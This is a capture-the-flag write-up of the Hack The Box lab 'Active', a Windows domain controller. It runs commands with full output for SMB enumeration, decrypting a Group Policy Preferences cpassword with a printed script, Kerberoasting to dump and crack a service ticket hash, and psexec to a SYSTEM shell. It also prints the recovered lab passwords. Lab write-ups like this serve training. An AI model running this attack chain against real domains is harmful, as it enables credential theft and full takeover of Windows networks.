Today we are going to solve another CTF challenge “Active”. Active is a retired vulnerable lab presented by Hack the Box for helping pentester’s to perform online penetration testing according to your experience level; they have a collection of vulnerable labs as challenges, from beginners to Expert level.

Level: Easy

Task: To find user.txt and root.txt file

Let’s start off with nmap command to find out the open ports and services.

root@kali:~/htb/active# nmap -sC -sV -oA nmap 10.10.10.100
Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-12 09:37 EST
Stats: 0:00:30 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 70.59% done; ETC: 09:38 (0:00:05 remaining)
Nmap scan report for 10.10.10.100
Host is up (0.030s latency).
Not shown: 983 closed ports
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2018-12-12 14:35:12Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -2m50s, deviation: 0s, median: -2m50s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2018-12-12 09:36:09
|_ start_date: 2018-12-09 21:48:35

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 169.48 seconds

As you can observe from Nmap scanning result, there are so many open ports along with their running services, the OS is Microsoft Windows server 2008:r2:sp1 and you can also read the domain name “active.htb”.

Enumeration
root@kali:~/htb/active# smbclient -L //10.10.10.100
Enter WORKGROUP\root's password:
Anonymous login successful

Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Replication Disk
SYSVOL Disk Logon server share
Users Disk
Reconnecting with SMB1 for workgroup listing.
Connection to 10.10.10.100 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Failed to connect with SMB1 -- no workgroup available
Then I try to access /Replication with the help smbclient and run the following command to access this directory via anonymous account:

root@kali:~/htb/active# smbmap -H 10.10.10.100
[+] Finding open SMB ports….
[+] User SMB session establishd on 10.10.10.100…
[+] IP: 10.10.10.100:445 Name: 10.10.10.100
Disk Permissions
—- ———–
ADMIN$ NO ACCESS
C$ NO ACCESS
IPC$ NO ACCESS
NETLOGON NO ACCESS
Replication READ ONLY
SYSVOL NO ACCESS
Users NO ACCESS
root@kali:~/htb/active# smbclient //10.10.10.100/Replication
Enter WORKGROUP\root’s password:
Anonymous login successful
Try “help” to get a list of possible commands.
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\GPT.INI of size 23 as GPT.INI (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Group Policy\GPE.INI of size 119 as GPE.INI (1.0 KiloBytes/sec) (average 0.6 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 1098 as GptTmpl.inf (9.8 KiloBytes/sec) (average 3.7 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as Groups.xml (4.2 KiloBytes/sec) (average 3.8 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Registry.pol of size 2788 as Registry.pol (25.2 KiloBytes/sec) (average 7.9 KiloBytes/sec)
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\GPT.INI of size 22 as GPT.INI (0.2 KiloBytes/sec) (average 6.7 KiloBytes/sec)
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 3722 as GptTmpl.inf (26.7 KiloBytes/sec) (average 10.1 KiloBytes/sec)
smb: \> SMBecho failed (NT_STATUS_CONNECTION_RESET). The connection is disconnected now
root@kali:~/htb/active# smbmap -R Replication -H 10.10.10.100 -A Groups.xml -q
[+] Finding open SMB ports….
[+] User SMB session establishd on 10.10.10.100…
[+] IP: 10.10.10.100:445 Name: 10.10.10.100
Disk Permissions
—- ———–
Replication READ ONLY
[+] Starting search for files matching ‘Groups.xml’ on share Replication.
[+] Match found! Downloading: Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml
Here I downloaded Groups.xml file
root@kali:~/htb/active# locate Groups.xml
/usr/share/smbmap/10.10.10.100-Replication_active.htb_Policies_{31B2F340-016D-11D2-945F-00C04FB984F9}_MACHINE_Preferences_Groups_Groups.xml
root@kali:~/htb/active# cat /usr/share/smbmap/10.10.10.100-Replication_active.htb_Policies_{31B2F340-016D-11D2-945F-00C04FB984F9}_MACHINE_Preferences_Groups_Groups.xml

So here I found cpassword attribute value embedded in the Groups.xml for user SVC_TGS.
Therefore I download a python script “Gpprefdecrypt” from GitHub to decrypt the password of local users added via Windows 2008 Group Policy Preferences (GPP) and obtain the password: GPPstillStandingStrong2k18

root@kali:/usr/share/smbmap# cat Gpprefdecrypt.py
#!/usr/bin/python
#
# Gpprefdecrypt – Decrypt the password of local users added via Windows 2008 Group Policy Preferences.
#
# This tool decrypts the cpassword attribute value embedded in the Groups.xml file stored in the domain controller’s Sysvol share.
#

import sys
from Crypto.Cipher import AES
from base64 import b64decode

if(len(sys.argv) != 2):
print “Usage: gpprefdecrypt.py ”
sys.exit(0)

# Init the key
# From MSDN: http://msdn.microsoft.com/en-us/library/2c15cbf0-f086-4c74-8b70-1f2fa45dd4be%28v=PROT.13%29#endNote2
key = “””
4e 99 06 e8 fc b6 6c c9 fa f4 93 10 62 0f fe e8
f4 96 e8 06 cc 05 79 90 20 9b 09 a4 33 b6 6c 1b
“””.replace(” “,””).replace(“\n”,””).decode(‘hex’)

# Add padding to the base64 string and decode it
cpassword = sys.argv[1]
cpassword += “=” * ((4 – len(sys.argv[1]) % 4) % 4)
password = b64decode(cpassword)

# Decrypt the password
o = AES.new(key, AES.MODE_CBC, “\x00” * 16).decrypt(password)

# Print it
print o[:-ord(o[-1])].decode(‘utf16’)
Let’s Decrypt the cpassword attribute
root@kali:/usr/share/smbmap# python gpppdecrypt.py edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18
Access Victim’s Shell via SMB connect and Privilege Escalation
In nmap scanning result we saw port 88 was open for Kerberos, hence their much be some Service Principal Names (SPN) that are associated with normal user account. Therefore we downloaded and install impacket from Github for using its python class GetUserSPN.py

root@kali:~/htb/active# python GetADUsers.py -all -dc-ip 10.10.10.100 active.htb/svc_tgs
Impacket v0.9.17 – Copyright 2002-2018 Core Security Technologies

Password:
[*] Querying 10.10.10.100 for information about domain.
Name Email PasswordLastSet LastLogon
——————– —————————— ——————- ——————-
Administrator 2018-07-18 15:06:40 2018-07-30 13:17:40
Guest
krbtgt 2018-07-18 14:50:36
SVC_TGS 2018-07-18 16:14:38 2018-12-10 01:17:54

root@kali:~/htb/active# python psexec.py active.htb/svc_tgs@10.10.10.100
Impacket v0.9.17 – Copyright 2002-2018 Core Security Technologies

Password:
[*] Requesting shares on 10.10.10.100…..
[-] share ‘ADMIN$’ is not writable.
[-] share ‘C$’ is not writable.
[-] share ‘NETLOGON’ is not writable.
[-] share ‘Replication’ is not writable.
[-] share ‘SYSVOL’ is not writable.
[-] share ‘Users’ is not writable.
root@kali:~/htb/active# smbmap -d active.htb -u svc_tgs -p GPPstillStandingStrong2k18 -H 10.10.10.100
[+] Finding open SMB ports….
[+] User SMB session establishd on 10.10.10.100…
[+] IP: 10.10.10.100:445 Name: 10.10.10.100
Disk Permissions
—- ———–
ADMIN$ NO ACCESS
C$ NO ACCESS
IPC$ NO ACCESS
NETLOGON READ ONLY
Replication READ ONLY
SYSVOL READ ONLY
Users READ ONLY
root@kali:~/htb/active# smbmap -d active.htb -u svc_tgs -p GPPstillStandingStrong2k18 -H 10.10.10.100 -R Users
[+] Finding open SMB ports….
[+] User SMB session establishd on 10.10.10.100…
[+] IP: 10.10.10.100:445 Name: 10.10.10.100
Disk Permissions
—- ———–
Users READ ONLY
.\
dw–w–w– 0 Sat Jul 21 10:39:20 2018 .
dw–w–w– 0 Sat Jul 21 10:39:20 2018 ..
dr–r–r– 0 Mon Jul 16 06:14:21 2018 Administrator
dr–r–r– 0 Mon Jul 16 17:08:56 2018 All Users
dw–w–w– 0 Mon Jul 16 17:08:47 2018 Default
dr–r–r– 0 Mon Jul 16 17:08:56 2018 Default User
-r–r–r– 174 Mon Jul 16 17:01:17 2018 desktop.ini
dw–w–w– 0 Mon Jul 16 17:08:47 2018 Public
dr–r–r– 0 Sat Jul 21 11:16:32 2018 SVC_TGS
.\\Default\
dw–w–w– 0 Mon Jul 16 17:08:47 2018 .
dw–w–w– 0 Mon Jul 16 17:08:47 2018 ..
dr–r–r– 0 Mon Jul 16 17:08:47 2018 AppData
dr–r–r– 0 Mon Jul 16 17:08:56 2018 Application Data
dr–r–r– 0 Mon Jul 16 17:08:56 2018 Cookies
dw–w–w– 0 Mon Jul 16 17:08:47 2018 Desktop
dw–w–w– 0 Mon Jul 16 17:08:47 2018 Documents
dw–w–w– 0 Mon Jul 16 17:08:47 2018 Downloads
–snip–
.\\SVC_TGS\Desktop\
dr–r–r– 0 Sat Jul 21 11:14:42 2018 .
dr–r–r– 0 Sat Jul 21 11:14:42 2018 ..
-r–r–r– 34 Sat Jul 21 11:14:42 2018 user.txt

Switch to Windows
c:\users\jacco>runas /netonly /user:active.htb\svc_tgs cmd
[on that runas prompt -> ]
C:\Windows\system32>dir \\10.10.10.100\Users
Volume in drive \\10.10.10.100\Users has no label.
Volume Serial Number is 2AF3-72E4

Directory of \\10.10.10.100\Users

21/07/2018 11:14
Administrator
14/07/2009 05:57 
Public
21/07/2018 16:16 
SVC_TGS
0 F0 file(s) 0 bytes
5 dir(s) 20.147.937.280 bytes free

C:\Windows\system32>type \\10.10.10.100\Users\SVC_TGS\Desktop\user.txt
86d*****e983
PS C:\Users\jacco> Test-NetConnection -Computername 10.10.10.100 -Port 389

ComputerName : 10.10.10.100
RemoteAddress : 10.10.10.100
RemotePort : 389
InterfaceAlias : Ethernet 2
SourceAddress : 10.10.14.19
TcpTestSucceeded : True
Sharphound
Kerberoasting

Kerberos is a protocol for authentication used in Windows Active Directory environments (though it can be used for auth to Linux hosts as well). In 2014, Tim Medin presented an attack on Kerberos he called Kerberoasting. https://files.sans.org/summit/hackfest2014/PDFs/Kicking%20the%20Guard%20Dog%20of%20Hades%20-%20Attacking%20Microsoft%20Kerberos%20%20-%20Tim%20Medin(1).pdf It’s worth reading through the presentation, as Tim uses good graphics to illustrate the process, but I’ll try to give a simple overview.

When you want to authenticate to some service using Kerberos, you contact the DC and tell it to which system service you want to authenticate. It encrypts a response to you with the service user’s password hash. You send that response to the service, which can decrypt it with it’s password, check who you are, and decide it if wants to let you in.

In a Kerberoasting attack, rather than sending the encrypted ticket from the DC to the service, you will use off-line brute force to crack the password associated with the service
Switch to Kali
root@kali:~/htb/active# python GetUserSPNs.py -request -dc-ip 10.10.10.100 active.htb/svc_tgs
Impacket v0.9.17 – Copyright 2002-2018 Core Security Technologies

Password:
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon
——————– ————- ——————————————————– ——————- ——————-
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 15:06:40 2018-07-30 13:17:40

$krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$d4e64efb7b7b843205406be1ea8ff311$8a6247145ea4e39fb6c85ab3a24a4c0a386aa824e39d554d6257b4f89d567bc0a01ca9ba5799e2de159fb09db2da1f7ab3df7753c4a05fb2c652ea60087dda97752207a1a7b9442a2f51dfc9483f1511f52f781c8eea77dbe8cc7d53246500cfb1dc499347e333cb32d66b0dba14a4f4f5abef8e07d1e5af65b4af2a95df0ef93a4b174ab5e6fa11096fac4dfb7c5fce97843f2d7878f0f4365cba42c539851ac2630ffebcf76f8d53400edea23244b9afa18c1a951b73e52f424a2cbe99ca46a05fc9642b41617fc4aff0f383c7b2b345c51817ff68da95e49e2ecc29aa2d129e26e9a3fc9d2c3326ffc827a540ae0bc097220b8537da3485922d74d97a0ff467d247f626ad872ed84ffbba8f237d81cffa780b8e0d27d09b7a2ffd0a6fdfa8cd93aee833f9633e3c5421b31639e1a1423c1147d2398c97252bb4e2ab38cdd055a331cf58ff95f8cf29bc6d3193bdec3ca5cfe8d50f90a7e6ac879cdc3c119a3e6babaa29c8656d4a4686edd88c2648dca386df1270053bde9e1ab67b648385b69a8807fd00850849cb1be23f8750104bb0abc2f1afaaeff9de225c8c7ddc771b69a7127dea8406610f53584c7c3d548b4e35c101e000b66cbe74d3a87bb20cc832a8396893a294428d30f749b507f03511628a3872648e2fa795d838dd6c289afcc4b4c5982e9ecefeec1c2c0755c94c6a6becca54fb54420bd50a6e4acafa5d9b8f44b74c1cb6e99399344a558c0acd43efa57b318d3a6a3239234faa780a207e6fc477afbe26fe40c8d400669a96febd77505214d5d74b6e30e13ad2992bb2c707ba1310991809c9cc84816192888b6590faab811a372880791df50669bb8527f8c0f965744ebace544d6d97b9ff0b02aa47070c5a4f8786c7a86e8dd580887bb96febee28c164a72cc4e7c403e591bc4b397aa326190ea6713876102aa3210bf1e447b03daa6dfb655ca1ef2832d11b31cfd80f6f06c9a1365a7bcf353c9f729d384b92c66923a42cd901fc2ac8a3cb65c698587eaf17fb5eabb97e3829a840f0f254ff432bc6d1ad68fc7340a895cf2cf6cb0160f50d6d12e2f001d16943d851880da2344300e09d44d72f2018408b6bbc0bc877f3299a560ba5ea62879c1872954a6e774d82292b1adfcac7d9bc17240fd71d4059bf9cc511ddee381521cb8a1b48b8d7dc21f4b1375c10475f924a3308bd22e35471fa6126342240492dabeccc95bd7f617ae91e8965679cfaef4e042482653a505d2a
Here we see that before requesting the TGS for a particular SPN, Impacket makes an (AS_REQ) Authentication Server Request and that the server responds with the TGT for this SVC_TGS service account. Note that the krbtgt doesn’t use the same encryption that the following TGS.

Then Impacket makes a TGS request that includes TGT information. Finally, the server responds with a TGS and Impacket format it in krb5tgs which is recognized by JTR and HC.

$krb5tgs$$*$$*$$
Now that we have a TGS, we can retrieve the Service’s password. If you run Kali, you will need to follow these steps for JTR to recognize the format.

root@kali:# git clone https://github.com/magnumripper/JohnTheRipper.git && cd JohnTheRipper/src
root@kali:/opt/JohnTheRipper/src# ./configure
checking build system type… x86_64-unknown-linux-gnu
checking host system type… x86_64-unknown-linux-gnu
checking whether to compile using MPI… no
checking for gcc… gcc
checking whether the C compiler works… yes
checking for C compiler default output file name… a.out
–snip–
config.status: linking x86-64.h to arch.h
config.status: executing default commands
configure: creating ./fmt_externs.h
configure: creating ./fmt_registers.h

Configured for building John the Ripper jumbo:

Target CPU …………………………… x86_64 SSE4.2, 64-bit LE
AES-NI support ……………………….. depends on OpenSSL
Target OS ……………………………. linux-gnu
Cross compiling ………………………. no
Legacy arch header ……………………. x86-64.h

Optional libraries/features found:
Memory map (share/page large files) …….. yes
Fork support …………………………. yes
OpenMP support ……………………….. yes (not for fast formats)
OpenCL support ……………………….. yes
Generic crypt(3) format ……………….. yes
libgmp (PRINCE mode and faster SRP formats) yes
128-bit integer (faster PRINCE mode) ……. yes
libz (pkzip and some other formats) …….. yes
libbz2 (gpg2john extra decompression logic) no
libpcap (vncpcap2john and SIPdump) ……… no
librexgen (regex cracking mode) ………… no
OpenMPI support (default disabled) ……… no
ZTEX USB-FPGA module 1.15y support ……… no

Install missing libraries to get any needed features that were omitted.

Configure finished. Now “make -s clean && make -sj4” to compile.

root@kali:/opt/JohnTheRipper/src# make -s clean && make -sj4
ar: creating aes.a
ar: creating ed25519-donna.a
ar: creating secp256k1.a
scrypt_fmt.c: In function ‘get_binary’:
scrypt_fmt.c:246:2: warning: ‘strncpy’ specified bound 256 equals destination size [-Wstringop-truncation]
strncpy(out, ciphertext, sizeof(out)); /* NUL padding is required */
^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
In function ‘pad100’,
inlined from ‘dynamic_pad100’ at dynamic_compiler.c:607:52:
dynamic_compiler.c:569:34: warning: ‘strncpy’ output may be truncated copying 100 bytes from a string of length 127 [-Wstringop-truncation]
static char *pad100() { strncpy(gen_conv, gen_pw, 100); return gen_conv; } /* NUL padding is required */
^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
In function ‘pad20’,
inlined from ‘dynamic_pad20’ at dynamic_compiler.c:606:52:
–snip–
In file included from /usr/include/CL/cl.h:36,
from opencl_common.h:26,
from opencl_DES_bs.h:13,
from opencl_DES_fmt_plug.c:22:
/usr/include/CL/cl_version.h:34:9: note: #pragma message: cl_version.h: CL_TARGET_OPENCL_VERSION is not defined. Defaulting to 220 (OpenCL 2.2)
#pragma message(“cl_version.h: CL_TARGET_OPENCL_VERSION is not defined. Defaulting to 220 (OpenCL 2.2)”)
^~~~~~~

Make process completed.
cd ../run ./john –test
$ ./john /usr/share/wordlists/rockyou.txt tgs.txt # DON’T use –format=krb5tgs
And then, voilà

root@kali:/opt/JohnTheRipper/run# ./john –wordlist=/usr/share/wordlists/rockyou.txt admin.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 2 OpenMP threads
Press ‘q’ or Ctrl-C to abort, almost any other key for status
0g 0:00:00:09 11.70% (ETA: 05:32:24) 0g/s 205994p/s 205994c/s 205994C/s dmrdlcrz..dlh622
0g 0:00:00:36 52.01% (ETA: 05:32:17) 0g/s 209321p/s 209321c/s 209321C/s hotheaven1..hotgirl2008
Ticketmaster1968 (?)
1g 0:00:00:49 DONE (2018-12-13 05:31) 0.02014g/s 212277p/s 212277c/s 212277C/s Tiffani1432..Tiago_18
Use the “–show” option to display all of the cracked passwords reliably
Session completed
Or Decrypt with hashcat
c:\PENTEST\hashcat>hashcat64.exe –force -m 13100 hashes.txt rockyou.txt
hashcat (v5.1.0) starting…

GoforIT
root@kali:~/htb/active# python psexec.py active.htb/Administrator@10.10.10.100
Impacket v0.9.17 – Copyright 2002-2018 Core Security Technologies

Password:
[*] Requesting shares on 10.10.10.100…..
[*] Found writable share ADMIN$
[*] Uploading file kdkWjbGn.exe
[*] Opening SVCManager on 10.10.10.100…..
[*] Creating service ujlu on 10.10.10.100…..
[*] Starting service ujlu…..
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system

Author: Jacco Straathof

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.